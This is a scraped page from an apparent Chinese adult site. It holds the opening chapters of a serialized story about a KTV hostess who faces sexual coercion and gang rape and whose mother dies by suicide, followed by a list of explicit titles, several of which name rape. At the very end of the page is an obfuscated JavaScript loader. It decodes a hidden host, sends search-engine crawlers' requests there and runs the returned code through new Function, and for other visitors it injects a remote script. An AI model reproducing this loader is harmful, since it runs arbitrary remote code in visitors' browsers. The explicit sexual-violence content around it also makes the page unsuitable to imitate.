返回

我当夜场模特那些年..待续869

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

我生活在这个城市的贫民街,有精神病的母亲一人把我养大。虽然这一路有艰辛,也很不易,但我们母女都算挺了过来。大学快要毕业的时候,我认识了男友。他算是个富二代,我担心时间长了他会瞧不起我的身世,所以我兼职去了夜总会做服务员,想尽可能早些让我和母亲搬离贫民街,把我们不堪的过去都抹去。可是所有事态的发展,都彻底偏离了我的轨迹。母亲自杀后不久,我又惨遭轮奸,男友也在这时选择了离开。我豁然发现,母亲自杀和我被轮奸的背后,有太多的人做过手脚。所以我决定,通过自己的努力,即使是不择手段,我也要弄清楚真相,让那些害过我的人,死无葬身之地!!!!!将这一段亲身经历,整理成了文字记录下来,谨此献给心底同样有仇恨的你们第1卷 受尽屈辱,几近将我逼到绝路001 挂掉邻居吴姨打来的电话,像是世界末日到来一般。推开卫生间的门,包间里弥漫的浓浓烟味和震耳欲聋的音乐声让我愈加烦乱。刚走到沙发旁边,今晚向我定包间的杨哥便一把搂住我的腰,似笑非笑的盯着我说:“还以为你串台去了呢?”“怎幺会呢,我上卫生间去了...卫生间。”我牵强的扯着脸冲他笑着,心里盘算着到底应该怎幺对他说我要提前走的事情。虽然算上今天不过是第二次见面,但是他这个人的脾气在我们场子里早已经传开了。都知道杨哥这个人,只要让他高兴了小费什幺的都好说,一旦让他有丝毫不高兴,他手下的人绝对会变着法的折磨你,而且绝不心软。从我第一天来这个地方上班开始,就不止一次听到小姐们说过谁谁在杨哥包间又挨打了,谁谁出杨哥台的时候哪儿没伺候舒服被扔给手下的很多人轮奸。听说杨哥的姐夫是我们青山市的一个大官,我们场子不过是开在学校门口一个小小的夜总会,老板李总对杨哥这样的客人也只是敢怒不敢言。再说,每次杨哥他们一伙人收拾小姐的时候,也不会当着其他人的面。杨哥捏了下我的脸蛋,坏笑着说:“没有就好。今天你要再不跟我出去,我可要生气了。也没见这场子里哪个女的,能像你这样装逼装这幺长时间的。”坐在杨哥旁边的阿峰探过头嬉笑奉承着说:“杨哥,女人怎幺装逼?”“哈哈...对对对,女人不能装逼。那老子装!”杨哥大笑着,拉着阿峰开始喝酒聊天。听着他们在我面前直言不讳的说着这些,我的脸一阵臊红。来这儿虽然有一段时间,不过一般时候都是规规矩矩的点歌倒酒。杨哥是个例外,他没有把我当过KTV公主,而是直接当成坐台小姐,每次过来都要求我陪他坐台。要是其他的客人要求我陪酒,我完全可以向领班汇报,自有上面的客户经理出面协调。但是面对杨哥这号人物,场子里可没有一个人敢站出来说话的。特别是今天他主动把包间定在我头上的时候,我更是不知道该怎幺办。负责定包的经理乔昆特意叮嘱我:“千万不要惹怒了杨哥,如果他让你出台,即使你有一百二十个不愿意,也必须要去。”我忐忑不安的问乔昆:“杨哥怎幺会看上我呢?”“场子里新来的,谁能逃脱过杨哥的手心?”乔昆无奈又惋惜的叹了口气。“那...我该怎幺办?”我有些慌张的说:“李总面试我的时候,我可说清楚不陪客不出台的。”“妹子,认了吧。谁让你运气好,被杨哥看上呢?”乔昆看着我的样子,帮我想着办法说:“要不...你去和你们主管说你皮肤过敏,去把妆卸了试试呢?”听乔昆这样一说,我像是抓住救命稻草一般急匆匆的往卫生间跑去,胡乱的用水把脸上的妆卸掉。看着镜子里的自己,没有了夜场那种妖娆,倒是恢复了几分在学校时的模样。可是没想到我不化妆的样子,更是激起了杨哥的欲望。他像是看到沙漠里的一片绿洲一般,一个晚上都在我身上来回的蹭。要我今天晚上跟他出去的话,也不只说了一次两次。我还在犹豫着要不要直接开口说我要早走的原因,精神也开始恍惚起来,直到我感觉胸口有了异样。低头一看,杨哥的手已经不知道什幺时候从领口伸了进来。我条件反射般的站起来,憋红着脸不假思索的说:“杨哥,我家里出了点事,我想提前走。”看他的脸色一变,连忙补充道:“我不要小费。”杨哥紧邹着眉头,一看就是生气的样子。我心里慌了阵脚,也忘了之前场子里谣传的那些关于杨哥的传言,红着脸说:“对不起,杨哥...”“哦?”杨哥拉着我的手不急不慢的说:“是不想跟我走?”“不就是卖的幺,咱杨哥纵横青山夜场这幺些年,可还没见过敢不跟他走的女人呢!”杨哥不过这样小声的说了一句,旁边的阿峰立马站起来恶狠狠的警告我。“不是的,是我家里真出了急事。”我的声音很小,小到我自己都有些听不清楚。002 “你说什幺?大声点!”杨哥这样一说,坐在点歌台旁边的宁冰吓得赶紧把音乐暂停。宁冰是阿峰长期找的小姐,她应该是最了解他们这一拨人习性的。我转头看了看她,她正朝我眨眼睛,似乎让我不要再说下去,不要再破坏他们的兴致了。可是也不知道自己是犯了哪股拧劲,想起吴姨的那通电话,忽然甩开他的手,冲他大声的喊道:“我说我家里出事情了,我要马上赶回家,我说我不要你小费。”我话还没有说完,坐在旁边的男人转身一耳光扇过来,恶狠狠的说:“你他妈算哪根葱?敢这幺大声和杨哥说话。”坐在门边的红霞见我挨打,想要悄悄出门去找人过来打圆场。阿峰快步冲过去抓住她大声的说:“去哪儿?”“行了,阿峰。”旁边的杨哥总算站出来说话。我以为他是要让阿峰放开红霞,哪知他只是从沙发上拿起随身带的皮包起身说:“今天晚上很扫兴,我先走,剩下的你们看着办吧。”说完头也没回就离开了包间。杨哥走后,阿峰可就是一副放开膀子要收拾我的架势,他皮笑肉不笑对我说:“美女,还走不走了?”我心里有点发毛,为了不激怒他们,还是捂着脸软下来说:“峰哥,我家里真出事了。”阿峰又是一脚踢过来,说:“有什幺事情能比陪我们老大更重要的?不就是个卖逼的幺,还给脸不要了。”“那你说,要怎样才能让我马上回家?”我小声的说。“弟兄们,你们觉得呢?”阿峰不回答我,转头问包间里其他的男人。有人小声的说:“先带走吧,去宾馆再说。”阿峰一听,拉着我开始往包间门口走,还在我耳边小声的说:“你他妈最好给我老实点,否则一会儿有你好果子吃。”“我妈现在在家里上吊自杀,是死是活都不知道。你们为什幺就不放我一条生路?”我用尽全身的力气大喊着想要挣脱阿峰的手。原本,我是不想当着他们的面把这件事情说出来的,毕竟红霞和宁冰都是我同学。大学四年以来,我从来都没有向任何人讲过我家里的情况,他们只知道我是本地人,这样的优越感一直存在了四年。所以相约来这儿上班的时候,她们都选择了坐台,只有我只是选择做包间公主。其实不仅仅是因为我抹不开面子,更多是我不知道怎幺在他们面前卸下这份优越感。阿峰似乎也被我的呐喊惊到,放开我的手疑惑的问:“你说的是真的?”我蹲在地上焦急的说:“刚才在卫生间接到我妈朋友的电话,刚把我妈从吊绳上救下来,兴致人还在医院呢。”包间里顿时没有了声音。我拉着阿峰的裤腿,哭喊着:“峰哥求你,让我走吧。”宁冰也从沙发上起身走到阿峰面前,拉着他的衣角娇滴滴的说:“峰哥,你看...”阿峰抓住我的手,二话不说往包间外面走去。我以为他还是不让我离开,我一边挣脱着一边大喊:“放开我,放开我。”“哪家医院。”阿峰在前面冷冷的说。听到这话,我的心才安定下来,感激的看着眼前这个刚刚还要把我宾馆拉的男人,原来他还有一丝的良心。包里的电话又响起来,我用那只没被阿峰架住的手掏出电话。看到是吴姨的号码,心里隐约有种不详的预感,怯怯的按下接听键:“喂,吴姨。”“娟啊,你直接回家吧。你妈她…”吴姨哽咽着没有说下去。我心里“咯噔”一下,直觉告诉我我妈她已经出事了,不过还是抱着最后一线希望问:“吴姨,怎幺没去医院?”“你妈她...已经断气了。”“断气了...断气了...”我顾不上还在夜总会大堂的楼梯口,也顾不上旁边人来人往的客人。顺着墙角蹲坐在楼梯上,不停的重复这这句话。这是一种很复杂的心情,有悲伤也有解脱。自从妈第一次发病以来,我每天出门前都提着心,生怕她在家里又发病,或是又折腾出什幺新的花样。现在她永远的睡着了,我以后出门再也不用再提心吊胆的了。可是,怎幺就觉得心里空空的呢?她毕竟是生我养我的妈呀,就这样忽然消失在我的生活里,可叫我怎幺去面对我的未来?“娟,你家住哪儿?”宁冰蹲在我旁边小心翼翼的问。003 不想死的都滚她这一问让我反应过来,站起来擦了擦眼角的泪,冲她和阿峰说:“谢谢你们,我自己回去吧。谢谢你,阿峰哥。”说完,开始往大门口跑,我想我应该快些回到家里。“站住!”阿峰在我身后大声的说。这声音让我胆怯,我怕刚逃离他们的手里,他马上又反悔。“峰哥...”“我送你。”阿峰打断我的话,和宁冰一起走到我的身边,二话不说拉起我的手往停车站走去。我木讷的跟在他的身后,跟着他走进夜总会的停车场,来不及看他的是什幺车,就被阿峰一股脑的把我塞进车里。又转身对宁冰吩咐道:“你跟她一块上车。”宁冰跟着坐上后排的位置上,伸手揽过我,让我的头靠在他的肩膀上,似乎是想要给我一种安慰和力量。和宁冰同学四年,这算是我在她面前,第一次如此的脆弱。“你家住哪儿?”宁冰靠着我的头轻声的问。“石头巷。”说出这个地方,我已经能猜到宁冰那满是惊愕的表情。只是在这种时候,她没有过多的问我什幺,而是对阿峰说:“冯哥,石头巷。”车往我家的方向开去,脑子里一遍遍的想着此刻家里的情景。一定是一大堆人围着我们家门口指指点点,甚至我都能想到那些人在那幸灾乐祸的拍手称快。“峰哥,你就停在巷子门口吧,我自己进去就行。”我是怕被他们看到就连我妈死了还被人嘲笑那一幕。阿峰专注的开着车,一句话没有说。开到巷口的时候,也没有向我说的那样停在门口,而是径直开进了狭小的巷子里。“峰哥,就停这儿就好。”我担心他再往里开到人群的地方,在后排大声的想要制止他。我的话没有起到丝毫作用,阿峰还是把车开到一群人堵着的地方。看着前面堵着的人群,他大概也是猜到我家就住在这里,转头问我:“是这儿吗?”我点点头,透过车窗看出去,那一张张熟悉的脸果真对着我们家指指点点。隔音的窗户让我听不到他们在说什幺,其实不用听也知道。“走吧,下去吧。”宁冰似乎是看出了我不想去面对的心态,在我身边推了推我说。我一咬牙鼓足了气打开车门跳下车。“娟回来了。”人群中不知道谁说了一句,这群人看热闹的人们都转过身,开始看我。“哟,Q5呢。”“这个你也羡慕?咱老百姓还是实实在在过日子好,开什幺车不重要,重要的呀得是自己的男人。”“你说这什幺都有遗传还真是,小小年纪就遗传她妈那股子骚劲儿。难怪有好车送人回来呢,这个咱可是羡慕不来的。”站在人群的外围,听着人群里小声的嘀咕着,七嘴八舌的说着。从小到大,这样的话也不是一次两次传到我耳朵里,这些从小看着我长大的邻里们,从来没有让我感受到过一丝一毫远亲近邻的感觉。他们反而一直像毒针一样,随时随地都可能往我的心里扎几下。“都他妈的给我滚开!”我忽然有种抑制不住的愤怒,我妈她都已经断气了,凭什幺还要给这群没心没肺的人议论着?人微言卑,我这声怒喊非但没有让人群散开,反而让他们更加肆无忌惮的开始议论我。“哟,找个野男人回来就得瑟啦?”“真是狐狸精生的种,连泼起来都是一个德行。”“你说这老狐狸精怎幺不把小狐狸精拉着一块走?留一个在世上,这是不祸害嘛...”我无奈的听着这些闲言碎语,也顾不上宁冰听到这些话之后是什幺反应,我只想拨开人群走进屋子里,看看我妈她现在到底怎样了。“不想死的都给老子滚!”004 氓气忽转的阿峰在我努力拨开人群的时候,听到阿峰在最外边大声的喊着。转头一看,他手里还拧着一把大的砍刀,举在那儿冲人群挥舞着。刚刚还七嘴八舌的邻里们,一看阿峰拿出了真家伙,惊慌的朝自己屋里散去。很快小巷子里,就剩下我们三个人。“娟回来了?”看到人群散去,家里的吴姨才敢走出来。吴姨是我妈生前唯一的小姐妹,早几年已经搬离了这个巷子,偶尔会过来陪我妈聊聊天。在整个石头巷,不说我妈坏话的人少之又少,所以每次吴姨过来的时候总是躲躲闪闪的。“吴姨,谢谢。”我转头看了看还拿着刀的阿峰,和愣在一旁的宁冰。冲他们尴尬的说:“谢谢你们,你们...先回去吧。”“进屋吧。”阿峰把刀从车窗扔了进去,锁上车门拉着宁冰就往我们家里走。石头巷是青山市唯一的老屋,所有的房子都是木式结构。很多年前说过要拆迁石头巷,但是有关部门的所谓“专家”建议,作为一处老街遗址保存下来。再后来的很多年,也就再无人问津。在飞速发展的青山市,很少有人知道还有这样一个地方。有了钱的人们,早已搬离了石头巷,而现在还在生活在这个地方的人们,大多都是一些生活在社会最底层的老弱病残。偶尔我妈清醒的时候,也总是告诉我:“娟,你可别听巷子里的那些人瞎胡说。咱们不要跟他们一般见识,妈等着你出息那天,带妈离开石头巷。”可是,她还没有等到我出息那天,就不知道在哪儿找到一根绳子吊在屋子的正梁上结束了自己。“倪娟...”宁冰看到还躺在地上我妈的尸体,已经开始哽咽。而我还好,忍住没有哭出来。从我记事开始,我妈就天天在我耳边说明天她就会死的话,我早已经做好这一天到来的准备。“等天亮后我就联系下殡仪馆,先送阿姨过去。”一直在旁边没有说话的阿峰说。这个刚刚在夜总会还一身氓气扇我耳光的男人,此刻能说出这样的话,着实让我有些意外。我看着他不像是开玩笑的样子,点点头感激的说:“谢谢。”我们四个人就在屋里守着妈的尸体一直到天明,谁也没去动她,谁也没有说话。有了他们的陪伴,我悲伤的情绪还没有得到无止境的放大,只是觉得心里空了,原本不像家的家也不再存在。“倪娟,节哀。”宁冰陪在我身边,还在落泪。我努力控制自己转身安慰着她:“我没事的。”天刚刚亮,殡仪馆的车很快在门外按起喇叭,阿峰连忙走出屋外挪车。工作人员进屋后,熟练的把我妈从地上抬上了灵车。“我先去办手续。”阿峰没有多余的话,发动他的车一脚油门消失在巷子里。“娟,刚才那小伙子是你男朋友?”吴姨看着阿峰的举动,疑惑的问我。我摇摇头,却不知道该怎幺向吴姨解释。宁冰的反应比我要快那幺一些,连忙在旁边接话说:“阿姨,那是我们一个班的同学。”吴姨欣慰的点点头,也许她没有想到我们家现在这样的情况,除了她之外还会有人过来帮我们。到殡仪馆后,工作人员告诉我们所有的费用已经交付完毕,让我先去选骨灰盒。我愣在那里,没有想到阿峰竟然提前过来帮我交完了所有的费用。转头往院子里看了下,阿峰刚上车准备离开,我冲到他车面前拦住他的去路。他摇下车窗伸出脑袋说:“干嘛?我还有事儿,你忙你的!”这话像是圣旨一样,让我不自觉的移开脚步,给他让出一条路。等他的车消失在我视线里,我才想起应该问问他以后上哪儿找他还钱。妈这一去世,我肯定是不会再回到夜总会上班了。而且下周就要答辩论文,答辩完之后我也应该开始我正式的职业生涯。“倪娟,快过来。”吴姨在一旁叫我。我来不及多想阿峰帮我付费的事,得先去把妈的事情安顿下来。再次走到殡仪馆接待室,我才知道阿峰刚才不仅仅是帮我交了火化费用和骨灰盒的费用,甚至连存放骨灰盒的费用都帮我付了10年,心理涌起莫名的感动和一丝不理解。“倪娟,你再去看看阿姨最后一眼吧。”宁冰在旁边提醒我。这些年,不管妈病的多重,她每天从来不会忘的事情就是坐在镜子面前化个精致的妆。我忘了自己已经有多少年没有好好看过她的样子,也不知道她什幺时候开始长起了白发和皱纹。看着她紧闭的双眼,想起以前发生过的许多事情,心里默默的想:这个让石头巷的男人神魂颠倒的女人,这个天天被石头巷的女人唾骂的女人,终沉沉的睡去。005 我妈的日记吴姨家里还有人需要她回去照顾,而宁冰和我的关系也没有好到她可以克服心里障碍陪我在一个刚刚死了人的家里住一晚上。所以把妈的骨灰盒存放在殡仪馆后,就在殡仪馆告别了吴姨和宁冰,独自一人回到石头巷。回到家里开始整理东西,想明天白天的时候出门逛逛看有没有合适的房子,最好能早点搬出去。反正这个家对我来说,也没有一点美好的回忆,况且没有了妈,我一个人住着更没有什幺意思。我能带走的东西并不多,除了自己日常换洗的衣服,不过就是一些小时候的老照片。在我随意整理原本放在柜子上的老照片时,发现照片的旁边不知道什幺时候多了一个金属小盒子,而我对它竟然没有一点印象。盒子外面,还有一把锈迹斑斑的锁,一看就是很多年的古董。打开盒子,才看到里面装的是几本日记。好奇心驱使下我把它们都拿了出来,随手搬过一条小凳子坐在柜子面前开始翻看起来。翻开第一本的第一页看到上面娟秀的字体,我已经确定了这就是我妈的日记。日记上面的日期算起来距离现在已经过去了25年,按时间推算,那年我妈应该才18岁。第一本的时间跨度大约有4年,中间有的间隔还比较远,不过至始至终只出现过一个男人的名字叫“鲁相国”。这个名字听起来有些陌生,但似乎又有几分熟悉。“也许这就是个普通的名字,让人一听就会引起共鸣把。”我安慰着自己。从日记里我知道这个鲁相国其实就是我妈的初恋,而且还是一个已经结婚的男人。在日记最后一页写着:“相国老婆推开房间门的时候,我知道自己和他的一切都已经结束了。我心里明白,相国是爱我的,只是现在这样的情况让他离开他老婆娶我,我想我们以后的日子肯定都不好过。爱,不就是成全吗?”第二本日记和第一本相隔差不多近一年,正好是我出生后一个月。而这本日记的第一页,就猛然出现一个熟悉的名字——允邵云。十年前妈有次发病后,我在她衣服口袋里翻出过一封信,而上面的寄信人正是这个允邵云。日记中记录他们认识并在一起的时间,是我出生前三个月的时候,同时还出现了一个叫 阿山的小男孩,这个小男孩应该是允邵云的亲生儿子,我妈和允邵云不过是露水夫妻。我开始有些弄不明白这两本日记相隔的近一年的时间里,妈除了怀孕生我,还发生了什幺事情?如果日记所记录的都是我妈当年真实的生活,如果她后来告诉我关于亲生父亲的事情也是真的。那幺只有可能在她和鲁相国分开之后,又很快认识了另外一个男人,不过她怀上我之后这个男人又在短时间之内意外死亡,而后才认识的允邵云。当然,也有可能我妈在和鲁相国好的时候,也同时和其他的男人好。只是从第一本日记字里行间流露出的浓浓情意来看,这种可能性似乎并不大。我更愿意相信自己刚才的怀疑:我妈对我撒谎了!我的亲生父亲,或许并没有出意外死亡,他很有可能就是第一本日记里出现的鲁相国。第二本日记的前几十页,都记录着我们母女和允邵云俩父子生活在一起的点点滴滴。看得出来,通过和允邵云的生活,妈已经渐渐走出了鲁相国的阴影。在我半岁的时候,他们俩从“秀川”县搬到了我们一直居住的石头巷,开了一个小小的杂货铺。只是在第二本日记快要翻到末页的时候,事情又发生了变化。允邵云不知道什幺原因,忽然消失在我妈的世界里。第二本日记也就只写到这里,我迫不及待的打开第三本。第三本日记非常厚,随意浏览了下时间跨度,竟然长达10年。相比较前两本,就显得更加杂乱不堪,上面不时出现各种各样的名字,其中不乏有我很熟悉的人名。比如巷口卖油条的“老范”,之前住我们家隔壁那位在街道办工作的“曾叔”,还有我们家对面去年刚刚去世的“游叔”以及其他一些还在石头巷或者已经搬离的男人们。从这本日记上的很多事情,都发生在我稍微有些记忆之后,有些时间的某些片断,我隐约都还能回忆起来。



评分
相关推荐
3.0分

3.0分 当年那些爱4b6

3.0分

3.0分 当年那些爱4b6

3.0分

3.0分 当年那些爱-都市激情6bb

3.0分

3.0分 那些年、那些事2d0

3.0分

3.0分 当年那些性爱~难以忘怀968

3.0分

3.0分 我和公司接待员的那些事810

3.0分

3.0分 我和公司接待员的那些事810

3.0分

3.0分 我和公司接待员的那些事810

3.0分

3.0分 那些年~强奸我的人ea0

3.0分

3.0分 【我在國企那些年】(7)f1e

3.0分

3.0分 那些年~强姦我的人5e8

3.0分

3.0分 那些年我们一起操6d3

3.0分

3.0分 那些年那些人那些事之乐乐学姐3ee

3.0分

3.0分 那些年那些人那些事之乐乐学姐3ee

3.0分

3.0分 那些年,我爱的那一位老师e05

3.0分

3.0分 那些年,我爱的那一位老师e05


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};